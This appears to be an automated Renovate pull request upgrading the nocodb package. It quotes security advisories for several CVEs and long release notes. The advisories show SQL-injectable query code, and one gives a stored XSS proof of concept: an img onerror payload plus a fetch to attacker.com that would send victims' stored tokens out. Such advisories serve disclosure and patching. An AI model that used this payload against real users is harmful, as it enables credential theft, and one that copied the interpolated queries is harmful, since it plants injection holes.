Update dependency nocodb to ^0.202.0 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
nocodb	^0.83.0 -> ^0.202.0

GitHub Vulnerability Alerts

CVE-2022-2079

Cross-site Scripting (XSS) - Stored in GitHub repository nocodb/nocodb prior to 0.91.9.

CVE-2022-2063

Improper Privilege Management in GitHub repository nocodb/nocodb prior to 0.91.8.

CVE-2022-2064

Insufficient Session Expiration in GitHub repository nocodb/nocodb prior to 0.91.9.

CVE-2022-3423

NocoDB prior to 0.92.0 allows actors to insert large characters into the input field New Project on the create field, which can cause a Denial of Service (DoS) via a crafted HTTP request. Version 0.92.0 fixes this issue.

CVE-2022-2062

In NocoDB prior to 0.91.7, the SMTP plugin doesn't have verification or validation. This allows attackers to make requests to internal servers and read the contents.

CVE-2023-5104

Improper Input Validation in GitHub repository nocodb/nocodb prior to 0.96.0.

CVE-2023-43794

Summary

Nocodb contains SQL injection vulnerability, that allows an authenticated attacker with creator access to query the underlying database.

Product

nocodb/nocodb

Tested Version

0.109.2

Details

SQL injection in SqliteClient.ts (GHSL-2023-141)

By supplying a specially crafted payload to the given below parameter and endpoint, an attacker can inject arbitrary SQL queries to be executed. Since this is a blind SQL injections, an attacker may need to use time-based payloads which would include a function to delay execution for a given number of seconds. The response time indicates, whether the result of the query execution was true or false. Depending on the result, the HTTP response will be returned after a given number of seconds, indicating TRUE, or immediately, indicating FALSE. In that way, an attacker can reveal the data present in the database.

The triggerList method creates a SQL query using the user-controlled table_name parameter value from the tableCreate endpoint.

async triggerList(args: any = {}) {
  const _func = this.triggerList.name;
  const result = new Result();
  log.api(`${_func}:args:`, args);

  try {
    args.databaseName = this.connectionConfig.connection.database;

    const response = await this.sqlClient.raw(
      `select *, name as trigger_name from sqlite_master where type = 'trigger' and tbl_name='${args.tn}';`,
    );
[...]

Impact

This issue may lead to Information Disclosure.

Credit

This issue was discovered and reported by GHSL team member @​sylwia-budzynska (Sylwia Budzynska).

Disclosure Policy

This report is subject to our coordinated disclosure policy.

CVE-2023-50718

Summary

---

An authenticated attacker with create access could conduct a SQL Injection attack on MySQL DB using unescaped table_name.

Details

---

SQL Injection vulnerability occurs in VitessClient.ts.

async columnList(args: any = {}) {
    const func = this.columnList.name;
    const result = new Result();
    log.api(`${func}:args:`, args);

    try {
      args.databaseName = this.connectionConfig.connection.database;

      const response = await this.sqlClient.raw(
        `select *, table_name as tn from information_schema.columns where table_name = '${args.tn}' ORDER by ordinal_position`,
      );

The variable ${args.tn} refers to the table name entered by the user.
A malicious attacker can escape the existing query by including a special character (') in the table name and insert and execute a new arbitrary SQL query.

Impact

---

This vulnerability may result in leakage of sensitive data in the database.

CVE-2023-49781

Summary

A stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality.

Details

The nc-gui/components/virtual-cell/Formula.vue displays a v-html tag with the value of "urls" whose contents are processed by the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag with href=XXX. However, it leaves all the other contents outside of the pattern URI::(XXX) unchanged, which makes the evil users can create a malicious table with a formula field whose payload is <img src=1 onerror="malicious javascripts"URI::(XXX). The evil users then can share this table with others by enabling public viewing and the victims who open the shared link can be attacked.

PoC

Step 1: Attacker login the nocodb and creates a table with two fields, "T" and "F". The type of field "T" is "SingleLineText", and the type of the "F" is "Fomula" with the formula content {T}
Step 2: The attacker sets the contents of T using <img src=1 onerror=alert(localStorage.getItem('nocodb-gui-v2'))URI::(XXX)
Step 3: The attacker clicks the "Share" button and enables public viewing, then copies the shared link and sends it to the victims
Step 4: Any victims who open the shared link in their browsers will see the alert with their confidential tokens stored in localStorage

The attackers can use the fetch(http://attacker.com/?localStorage.getItem('nocodb-gui-v2')) to replace the alert and then steal the victims' credentials in their attacker.com website.

Impact

Stealing the credentials of NocoDB user that clicks the malicious link.

---

Release Notes

nocodb/nocodb (nocodb)

v0.202.10: : Bug Fix Release

Compare Source

🚀 NocoDB : Bug Fix Release

What's Changed

• chore(renovate): Update dependency @​nuxt/image-edge to v1.1.0-28355789.b3279fe by @​renovate in #​7127
• docs: formula expansion as md sections by @​dstala in #​7116
• fix : added tooltip for column fields by @​musharaf-nocodb in #​7114
• fix: various leftover stuff by @​mertmit in #​7140
• fix: deprecate title length validator and use title on import editor by @​mertmit in #​7092
• fix: group by has many bt part by @​mertmit in #​7146
• fix: Added new join cloud btn by @​dstala in #​7072
• feat: display as progress by @​mertmit in #​7138
• fix: Extract api token roles by @​pranavxc in #​7169
• fix: filter mimetypes to preview in browser by @​mertmit in #​7162
• fix: use getSchema instead of validate for ajv by @​mertmit in #​7160
• fix: leftover issue with alternative clients by @​mertmit in #​7164
• fix: Missing values in LTAR columns by @​pranavxc in #​7161
• fix(nc-gui): non-image attachments in shared form by @​wingkwong in #​7177
• fix: while validating options check for option with wrapped in single quotes by @​pranavxc in #​7170
• fix : fixed column syncing in useViewColumnsOrThrow hook by @​musharaf-nocodb in #​7168
• fix : added showOnTruncateOnly prop in tooltip component by @​musharaf-nocodb in #​7163
• Fix: Misc minor design changes by @​rameshmane7218 in #​7148
• Nc fix/rich text followup by @​dstala in #​7175
• fix: Nested data apis(v2) permission issue by @​pranavxc in #​7179
• feat: support yyyy-mm in Datepicker by @​wingkwong in #​6870
• enhancement: rollup by @​wingkwong in #​6853
• fix: exact date filter not working on datetime by @​DarkPhoenix2704 in #​7189
• fix: Load userList only if allowed by @​pranavxc in #​7194
• fix: Ignore throwing error in upgrader if error is index already exist by @​pranavxc in #​7195
• fix: Escape single quote properly and when updating single select default value by @​pranavxc in #​7197
• feat: paste option in cell right click context menu by @​rameshmane7218 in #​7207
• fix: UI/UX fixes #​7156 by @​rameshmane7218 in #​7173
• fix(nc-gui): add missing kanban clbk in expanded form by @​wingkwong in #​7200
• fix: rename ncProjectId to ncBaseId by @​mertmit in #​7213
• fix: Avoid setting default value(LTAR/Links) when adding new row in grouped by table by @​pranavxc in #​7208
• Fix/dropdown UI by @​musharaf-nocodb in #​7181

🐛 Closed Issues

• [closed] 🐛 Bug: Upgrade to 0.202.9 causes NocoDB to crash when visualizing a Grid View with Group By #​7205
• [🏗️ Status: In Resolution] 🐛 Bug: Grid View - When adding a new Record with a Group By on the view, the field corresponding to the Group By remains empty #​7204
• [🐛 Type: Bug] 🐛 Bug: [UX] Kanban View - When adding a record in a stack, the new record goes to (and stays in) the "Uncategorized" stack instead of its correct stack #​7198
• [Status: Reproducible] 🐛 Bug: API v2 returning 403 in "GET link records list" and "POST link records" methods #​7174
• [closed] 🐛 Bug: [MySQL] unable to use set select field with single quotes as default value #​7171
• [closed] 🐛 Bug: M2M tables without content after update #​7158
• [closed] 🔦 Feature: Switching among RTL form fields using tab button #​7157
• [closed] 🐛 Bug: UI/UX fixes #​7156
• [🐛 Type: Bug] 🐛 Bug: failed to open / download non-image attachments in shared form #​7155
• [🔎 Status: More Info Needed] 🐛 Bug: Invalid path concatenated while installing nocodb-sdk #​7151
• [closed] 🐛 Bug: invalid option error when inserting to single select column #​7149
• [closed] 🔦 Feature: When "grouping by", allow to select the number of elements to display #​7147
• [closed] 🐛 Bug: Group-by for belongs-to field throws error #​7144
• [closed] 🐛 Bug: API giving 403 after latest update #​7141
• [closed] 🐛 Bug: Rename View In Dropdown menu #​7136
• [👩‍🔬 Status: In-Analysis] 🐛 Bug: All the links have disappeared #​7125
• [closed] 🐛 Bug: Not able to change body in webhook of nocodb cloud #​7118
• [Status: Reproducible] 🐛 Bug: Fields are no longer displayed in full. #​7108
• [🏗️ Status: In Resolution] 🐛 Bug: Unauthorized access when using API token in n8n node #​7084
• [closed] 🐛 Bug: Rich text follow-ups #​7074
• [🟣 Priority: Low] 🐛 Bug: page reloads without any reason sometimes #​7033
• [closed] 🔦 Feature: display as progress bar for percent #​6973
• [closed] 🐛 Bug: NocoDB Cloud Available #​6970
• [closed] enhancement: rollup #​6852
• [closed] 🐛 Bug: Deployment Failure when migrating from 0.111.1 to 0.202.5 (Railway) - "Migration from 0108002 to 0111002 failed", Relation aready exists #​6826
• [closed] 🔦 Feature: Support use of Rollup's with in formula #​6807
• [closed] 🐛 Bug: Use Rollup sum for duration field，the data display should also be duration, but it shows the number of seconds. #​6778
• [closed] 🔦 Feature: columnType Date Format : add YYYY-MM #​5199

New Contributors

• @​musharaf-nocodb made their first contribution in #​7114
• @​rameshmane7218 made their first contribution in #​7148

Full Changelog: nocodb/nocodb@0.202.9...0.202.10

v0.202.9: : Bug Fix Release

Compare Source

🚀 NocoDB : Bug Fix Release

🐛 Closed Issues

• [Status: Reproducible] 🐛 Bug: Creating Link Between Records Via V2 API Throws Error #​7119
• [Status: Reproducible] 🐛 Bug: Links and Link to another record API strange behavior #​7109
• [closed] 🐛 Bug: Use ncRecordId with API #​7086
• [🏗️ Status: In Resolution] 🐛 Bug: Unauthorized access when using API token in n8n node #​7084
• [closed] 🐛 Bug: for viewer & commenter role, do not ask for save changes on closing expanded record #​7066
• [closed] 🐛 Bug: Additional download menu displayed in toolbar for viewer & commenter role #​7065
• [Status: Reproducible] 🐛 Bug: Hit delete key on formula focused textfield will remove the whole new field #​7050
• [closed] 🐛 Bug: icons mapped at Lookup > Child field needs fix #​6989
• [Status: Reproducible] 🐛 Bug: Lookup for barcode, qrcode displays only one image even if multiple links exist #​6988
• [Status: Reproducible] 🐛 Bug: Error when creating lookup column #​6975
• [closed] 🐛 Bug: grid skeleton loader UX & performance enhancements #​6961
• [closed] 🐛 Bug: Locked view #​6934
• [closed] 🐛 Bug: Expanded record, refresh formula field when associated field is updated & saved #​6931
• [closed] 🐛 Bug: Webhook payload not escaped/formatted correctly #​6822
• [🐬 DB : MySQL] 🐛 Bug: Add/Edit modal with MySQL #​6747
• [🔎 Status: More Info Needed] 🐛 Bug: Not getting correct response in webhook payload. #​6746
• [🟣 Priority: Low] 🐛 Bug: Auto increment field ID not ignored if sent in API payload #​5871
• [closed] 🐛 Bug: Populating select values via the API doesn't fully work #​5492
• [🐛 Type: Bug][🏗️ Status: In Resolution] 🐛 Bug: Sort by Lookup column does not work #​2573
• [🔦 Type: Feature][🍰 Scope : Column] Feature: Rich editor for multiline text #​298

What's Changed

• Release 0.202.8 by @​github-actions in #​7036
• chore(renovate): Update patch (patch) by @​renovate in #​7034
• New Crowdin updates by @​o1lab in #​7040
• chore(renovate): Update patch (patch) by @​renovate in #​7041
• fix: Fixed issue with Cell icon not taking column prop with column in… by @​dstala in #​7048
• chore(renovate): Update dependency mysql2 to ^3.6.4 by @​renovate in #​7047
• chore(renovate): Update patch (patch) by @​renovate in #​7052
• fix: Auto increment field ID not ignored if sent in API payload by @​aashishagrawall in #​6878
• feat: Missing formula functions support by @​pranavxc in #​7019
• fix: Fixed issue with formula not getting updated in expanded form on… by @​dstala in #​7055
• fix: use json as default content type for webhooks by @​mertmit in #​7056
• fix: delete for formula in fields menu by @​dstala in #​7062
• New Crowdin updates by @​o1lab in #​7059
• chore: bump axios version by @​mertmit in #​6949
• Nc fix/skelton fix by @​dstala in #​7063
• Locked mode by @​mustafapc19 in #​7067
• chore(renovate): Update patch (patch) by @​renovate in #​7057
• fix: augment #app rather than #app/nuxt by @​danielroe in #​7064
• fix: Update acl.ts to allow editor to import excel files by @​cedstrom in #​7043
• Miscellaneous bug fixes/enhancements by @​pranavxc in #​7054
• New Crowdin updates by @​o1lab in #​7069
• Rich text long text by @​mustafapc19 in #​7046
• feat: id instead title in queries by @​mertmit in #​7060
• fix: various at-import issues by @​mertmit in #​7076
• New Crowdin updates by @​o1lab in #​7081
• chore(renovate): Update patch (patch) by @​renovate in #​7082
• Subtle update to spanish.md by @​Scalcaneo in #​7088
• Nc fix/misc 3 by @​dstala in #​7089
• Remove signup link from signup page if invite only signup enabled by @​pranavxc in #​7044
• fix: Validate select options before insert by @​pranavxc in #​7070
• fix: use getWithRoles for auth token strategy by @​mertmit in #​7083
• chore(renovate): Update dependency @​vue/compiler-sfc to ^3.3.9 by @​renovate in #​7093
• fix: use title instead of id while substituting by @​mertmit in #​7094
• chore(renovate): Update patch (patch) by @​renovate in #​7097
• chore(renovate): Update patch (patch) by @​renovate in #​7098
• New Crowdin updates by @​o1lab in #​7101
• New Crowdin updates by @​o1lab in #​7104
• chore(renovate): Update patch (patch) by @​renovate in #​7102
• Fixed skelton loading issue by @​mustafapc19 in #​7105
• fix: Render label span only if default slot is defined by @​pranavxc in #​7106
• chore(renovate): Update patch (patch) by @​renovate in #​7110
• New Crowdin updates by @​o1lab in #​7107
• fix: Fields query param - virtual column by @​pranavxc in #​7111
• fix: Extract row id value using title by @​pranavxc in #​7120
• 0.202.9 Pre-release by @​github-actions in #​7121

New Contributors

• @​aashishagrawall made their first contribution in #​6878
• @​cedstrom made their first contribution in #​7043
• @​Scalcaneo made their first contribution in #​7088

Full Changelog: nocodb/nocodb@0.202.8...0.202.9

v0.202.8: : Bug Fix Release

Compare Source

🚀 NocoDB : Bug Fix Release

🐛 Closed Issues

• [closed] 🐛 Bug: error when filtering by lookup field that is Link in the parent table. #​7027
• [closed] 🐛 Bug: API V2 Update API /rowid is missing #​7021
• [🐛 Type: Bug] 🐛 Bug: Api linked fields duplicated #​7020
• [🐛 Type: Bug] 🐛 Bug: Import excel throw 42701 Error #​6998
• [closed] 🐛 Bug: Uniform error in API v2 #​6986
• [Status: Reproducible] 🐛 Bug: import file content title not support unicode eg.(emoji🔥, Chinese) #​6959
• [closed] Runtime directive used on component with non-element root node. The directives will not function as intended. #​6952
• [closed] 🐛 Bug: multi fields editor, field type icons displayed are incorrect #​6946
• [closed] 🐛 Bug: Migration directory is corrupt #​6936
• [closed] Connect New Data Source #​6913
• [closed] 🐛 Bug: view context menu to include download CSV & upload CSV options #​6857
• [closed] 🐛 Bug: API LINK RECORDS ENDPOINT NOT WORKING. #​6823
• [closed] 🐛 Bug: Default View not showing if you moved it to other row in past version #​6798
• [closed] 🔦 Feature: Allow grouping by more column types #​6247
• [🔎 Status: More Info Needed] 🐛 Bug: Failure to duplicate project/table #​5788

What's Changed

• Release 0.202.7 by @​github-actions in #​7008
• Fix GitHub casing in Translation page by @​varghesejose2020 in #​7009
• chore(deps-dev): bump sharp from 0.32.5 to 0.32.6 by @​dependabot in #​7011
• chore(renovate): Security update Update dependency passport to ^0.6.0 [SECURITY] by @​renovate in #​6995
• Korean enum Language correction by @​bsy0317 in #​7014
• fix: New data api(v2) insert method bug by @​pranavxc in #​7015
• fix(s3): use stream to upload via url by @​mertmit in #​7018
• chore(deps): bump sharp and @​docusaurus/plugin-ideal-image in /packages/noco-docs by @​dependabot in #​7010
• Fix GitHub Casing issue in 060.builds-and-releases.md by @​varghesejose2020 in #​7024
• refactor: Uniform error message by @​pranavxc in #​7025
• chore(renovate): Update patch (patch) by @​renovate in #​6996
• chore(renovate): Update patch (patch) by @​renovate in #​7028
• fix: vue warnings by @​wingkwong in #​6954
• chore: logic for replacing version by @​mertmit in #​6759
• fix: import sanitization by @​wingkwong in #​7022
• chore(renovate): Update patch (patch) by @​renovate in #​7031
• New Crowdin updates by @​o1lab in #​7032
• fix: on clicking table node navigate to default view by @​pranavxc in #​7023
• fix: Avoid treating value as column_name in sql join by @​pranavxc in #​7017
• fix: ignore duplicate item in LTAR by @​pranavxc in #​7030
• 0.202.8 Pre-release by @​github-actions in #​7035

New Contributors

• @​varghesejose2020 made their first contribution in #​7009
• @​bsy0317 made their first contribution in #​7014

Full Changelog: nocodb/nocodb@0.202.7...0.202.8

v0.202.7: : Hotfix Release

Compare Source

🚀 NocoDB : Hotfix Release

What's Changed

• fix: select options delete and reorder by @​mertmit in #​7005

Full Changelog: nocodb/nocodb@0.202.6...0.202.7

v0.202.6: : Bug Fix Release

Compare Source

🚀 NocoDB : Bug Fix Release

🐛 Closed Issues

• [closed] Action Required: Fix Renovate Configuration #​6993
• [closed] How do I tell what version of nocodb I'm running? #​6985
• [closed] 🐛 Bug: select options remove issue #​6971
• [closed] ERD #​6968
• [closed] Storage location of database files #​6966
• [Status: Reproducible] 🐛 Bug: error with default value configuration in date field (PG) #​6964
• [closed] 🐛 Bug: Regression on json column type, cannot use json array, invalid input syntax #​6963
• [closed] 🐛 Bug: issue with leading or trailing space in select options #​6960
• [closed] 🐛 Bug: Show v2 API in Swagger #​6958
• [closed] 🔦 Feature: pagination size for group by #​6944
• [closed] 🐛 Bug: Invalid filter in list API #​6943
• [closed] 🐛 Bug: No EOF in long text and impossible to see in a lookup #​6929
• [closed] 🐛 Bug: UI Misc #​6927
• [closed] 🐛 Bug: Duplicate base doesn't copy table/view icons #​6926
• [closed] 🔦 Feature: When creating a new record from the link adding menu, link it automatically #​6925
• [closed] 🐛 Bug: Not possible now to get Attachments URL through Webhook #​6924
• [closed] 🐛 Bug: CSV import, truncate table/field name if it exceeds limit #​6916
• [closed] 🐛 Bug: Google auth token parse failure #​6915
• [closed] 🐛 Bug: Update Nocodb latest #​6911
• [🔎 Status: More Info Needed] 🔦 Feature: Do have the function of printing design？ #​6906
• [closed] permissions Precise to Fields #​6893
• [closed] 🔦 Feature: Turn all values in a column into a linked field. #​6892
• [closed] 🐛 Bug: 8080 Port occupied node:events:515 throw er; // Unhandled 'error' event #​6891
• [closed] Change the default language to Chinese #​6885
• [closed] 🐛 Bug: Nest can't resolve dependencies of the EventSubscribersLoader #​6884
• [closed] 🔦 Feature: Base Reordering #​6882
• [closed] 🔦 Feature: Still not possible to rollup a formula field #​6881
• [closed] 🐛 Bug: Duplicate database error #​6874
• [closed] 🔦 Feature: Support details in README #​6868
• [closed] 🐛 Bug: .HEIC files are not supported #​6866
• [closed] 🐛 Bug: Delete Data Source => Remove Data Source #​6862
• [closed] How to make the modified UI interface take effect on port 8080？？？ #​6859
• [closed] 🔦 Feature: Do not automatically reveal newly created fields in all of the previously existing views #​6858
• [closed] 🐛 Bug: display column ID in multi-fields editor #​6850
• [Status: Reproducible] 🐛 Bug: Linked records modal from form view is stuck with skeleton loader #​6844
• [closed] 🐛 Bug: Invalid redirection URL #​6843
• [🐛 Type: Bug][🏗️ Status: In Resolution] 🐛 Bug: Cannot change the Account Name #​6841
• [closed] 🐛 Bug: NotFoundException: Cannot GET /plugins/ovhCloud.png #​6840
• [🏗️ Status: In Resolution] 🐛 Bug: AUTH TOKEN FOR CLOUD VERSION DOES NOT WORK WITH N8N #​6837
• [closed] 🐛 Bug: default value for GeoData field type #​6832
• [closed] 🐛 Bug: Expanded record read only fields #​6830
• [closed] 🐛 Bug: keyboard shortcut- map backspace to clear cell #​6821
• [closed] 🔦 Feature: Checkbox based Kanban Board #​6818
• [closed] 🔦 Feature: Table Level Access #​6813
• [closed] 🔦 Feature: Web clipper extension #​6806
• [closed] 🔦 Feature: The Buttons in the Header Section Lacks Transition #​6804
• [Status: Reproducible] 🔦 Feature: Expanded Row Autosave and Searchtool #​6799
• [closed] 🐛 Bug: In grid view, behaviour on click & right click field header #​6793
• [closed] 🔦 Feature: Make the view creation MORE visible. #​6792
• [closed] 🔦 Feature: Drag and drop reorder of column #​6791
• [🐛 Type: Bug] 🐛 Bug: Additional property DB_QUERY_LIMIT_MAX is not allowed #​6790
• [closed] 🐛 Bug: Team & Settings not accessible for Org Creator #​6784
• [closed] 🐛 Bug: exclude junction table relation from swagger #​6783
• [closed] 🐛 Bug: fields dropdown UI #​6781
• [closed] 🔦 Feature: support for duplicate column with data #​6779
• [closed] 🐛 Bug: consistency with Inflection & capitalise of different names used with in nocodb #​6768
• [🐛 Type: Bug][Status: Reproducible] 🐛 Bug: Attachment-type data's title string doesn't match non-Ascii char #​6760
• [🏗️ Status: In Resolution] 🐛 Bug: Webhook link can't be private IP address of LAN #​6757
• [🏗️ Status: In Resolution] 🐛 Bug: Filters not updating after upgrade #​6752
• [👩‍🔬 Status: In-Analysis] 🐛 Bug: Image permalinks broke after update - how to get new ones? #​6745
• [🔎 Status: More Info Needed] 🐛 Bug: Cloud : import in csv file #​6703
• [Status: Reproducible] 🐛 Bug: custom singular / plural label for links field was reset after docker restart #​6702
• [Status: Reproducible] 🐛 Bug: The page is displayed as the key of the i18n json file #​6700
• [👩‍🔬 Status: In-Analysis] 🔦 Feature: New Keybindings #​6699
• [🐹 DB : SQLite] 🐛 Bug: SQLite created-at, updated-at says Invalid Date #​6683
• [closed] 🐛 Bug: Language pack missing #​6613
• [Status: Reproducible] 🐛 Bug: A line on screen when we try to delete a column #​6526
• [closed] 🐛 Bug: WebHook configuration options doesn’t show #​6525
• [closed] Expanded record UI/UX Issues #​6506
• [closed] Grid View UX Issues #​6505
• [Status: Reproducible] 🐛 Bug: Swagger schema does not match api response #​6477
• [closed] 🐛 Bug: ERD, show only table name by default #​6458
• [Status: Reproducible] 🐛 Bug: Shared view sort displays ID instead of field name #​6456
• [closed] 🐛 Bug: Columns created as "LinkToAnotherRecord" moved to "Links" but still showing child records instead of new display #​6453
• [Status: Reproducible] 🐛 Bug: Shared grid view expanded record not accessible #​6452
• [closed] 🔦 Feature: UI for next empty ws #​6432
• [🔎 Status: More Info Needed] 🐛 Bug: Tables appear several times in the left menu times after Syncing metadata #​6407
• [closed] 🐛 Bug: Emoji not visible after modifying the corresponding smartsheet #​6406
• [🧱 Type: Refactoring] Confusing / Misleading Create Database #​6398
• [📞 Status: Need Internal Discussion][Status: Reproducible] 🐛 Bug: Collaborator Access is read only #​6391
• [🥅 DB : MSSQL] 🐛 Bug: Import Data button doesn't work correctly for Excel imports #​6385
• [Status: Reproducible] 🐛 Bug: Tables in sidebar always showed titlecased #​6381
• [closed] 🐛 Bug: Search Box Autosearch --> executing to many api calls #​6379
• [closed] 🐛 Bug: Sidebar being Inverted #​6374
• [closed] 🐛 Bug: default value not applied if value was modified before submitting link shared form #​6372
• [Status: Reproducible] 🐛 Bug: undo don't work properly #​6371
• [📋 Scope : Docs] 🐛 Bug: Unclear documentation about choosing a database #​6364
• [🐛 Type: Bug] 🐛 Bug: The expansion of long text is not available in the shared table view #​6359
• [closed] 🔦 Feature: Add "collaborator" field type to support assignments #​6356
• [🐛 Type: Bug] 🐛 Bug: Setting any incorrect column name, resulting in erroneous deletion of data #​6342
• [closed] Outdated screenshots in README.md #​6327
• [closed] 🐛 Bug: Table not loading. (Console Error: Failed to fetch dynamically imported module) #​6326
• [Scope : Test [E2E]] Test: Enable PW tests for ACL #​6316
• [🟣 Priority: Low] 🐛 Bug: Undo row delete not supported when triggered from expanded row #​6313
• [📞 Status: Need Internal Discussion] 🔦 Enhancement: DataSources > Metadata - interaction #​6310
• [👩‍🔬 Status: In-Analysis] 🐛 Bug: Performance Issues since 0.111.0 #​6302
• [🔎 Status: More Info Needed] 🐛 Bug: Can't grab slide bar on the right side in Microsoft Edge or Chrome #​6299
• [📞 Status: Need Internal Discussion] 🔦 Feature: Links, allow option to not Automatically Rollup #​6298
• [closed] 🐛 Bug: Mirroring Popup Window #​6296
• [closed] 🔦 Feature: Env variable for the CSV / Excel file upload (only for OSS) #​6295
• [🔎 Status: More Info Needed] 🐛 Bug: Geodata column type missing #​6294
• [Scope : Test [E2E]] 🐛 Bug: PW (flaky) : columnLinkToAnotherRecord.spec.ts #​6291
• [closed] 🐛 Bug: ERROR [i] Knex: Timeout acquiring a connection. The pool is probably full. #​6272
• [closed] 🔦 Feature: add option to pause animations - Gallery view carousel #​6258
• [🐛 Type: Bug] 🐛 Bug: Collaborator role configuration menu is blank #​6256
• [🔦 Type: Feature] 🔦 Feature: form with pre-compiled, "hidden" fields #​6253
• [🔦 Type: Feature] 🔦 Feature: Ability to group multiple projects in to a folders #​6240
• [🔦 Type: Feature] 🔦 Feature: Ability to hide/unhide the table/project #​6239
• [🔦 Type: Feature] 🔦 Feature: Pin a project on top #​6238
• [closed] Cannot click tables on mobile #​6234
• [closed] 🐛 Bug: QR-Code on API Call not transmitted as image #​6209
• [Status: Reproducible][🏗️ Status: In Resolution] 🐛 Bug: QR Code Column gets deleted on Sync Metadata #​6206
• [closed] 🐛 Bug: Swagger is not openned in https from the https dashboard #​6195
• [closed] 🐛 Bug: Filters in GUI also affects the data API #​6159
• [closed] 🔦 Feature: In embedded view, anybody should be able to copy cells #​6155
• [closed] 🐛 Bug: nested[where] doesn't work with primary key if have display value #​6154
• [closed] 🐛 Bug: File name extends the area on CSV import. #​6151
• [closed] 🐛 Bug: REST API filter get data outside conditions. #​6148
• [closed] Feature : Bulk update relational columns via API #​6144
• [closed] 🐛 Bug: The filter when searching the table as specified in the description (where=(colName,like,%name) ) does not work with Cyrillic. #​6135
• [🐛 Type: Bug] 🐛 Bug: Couldnot send the sample payload data to mail using webhook #​6132
• [closed] 🐛 Bug: XLSX Table Download Broken for Big Tables #​6116
• [closed] 🔦 Feature: When multiple people edit data at the same time，can real-time refresh #​6103
• [closed] Cell Scaled Picture/Attachment Thumbnail [Feature] #​6099
• [closed] 🐛 Bug: TypeError while importing airtable database #​6096
• [closed] 🔦 Feature: view the images in fullscreen mode by clicking on them in the gallery view. #​6084
• [🐛 Type: Bug] 🐛 Bug: Filters return all records when specifying an incorrect field name #​6081
• [closed] row level security workaround (implemented at the backend) #​6076
• [🐛 Type: Bug][Status: Reproducible] 🐛 Bug: Webhook - After Insert event triggers 2+ requests if table has relation #​6068
• [closed] 🐛 Bug: SDK for attachment type not working in node environment #​6062
• [closed] 🔦 Feature: ONE serach box in shared table view #​6058
• [🔎 Status: More Info Needed] 🐛 Bug: Error Cannot read properties of null (reading 'date_format') when import excel or csv file #​6035
• [🔎 Status: More Info Needed] 🐛 Bug: Expanding a record with multi-step many-to-many relationships throws an error #​6020
• [closed] 🔦 Feature: Monday as first day of week in calendar popup #​5988
• [Status: Reproducible] 🐛 Bug: Webhook trigger is differe

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: package-lock.json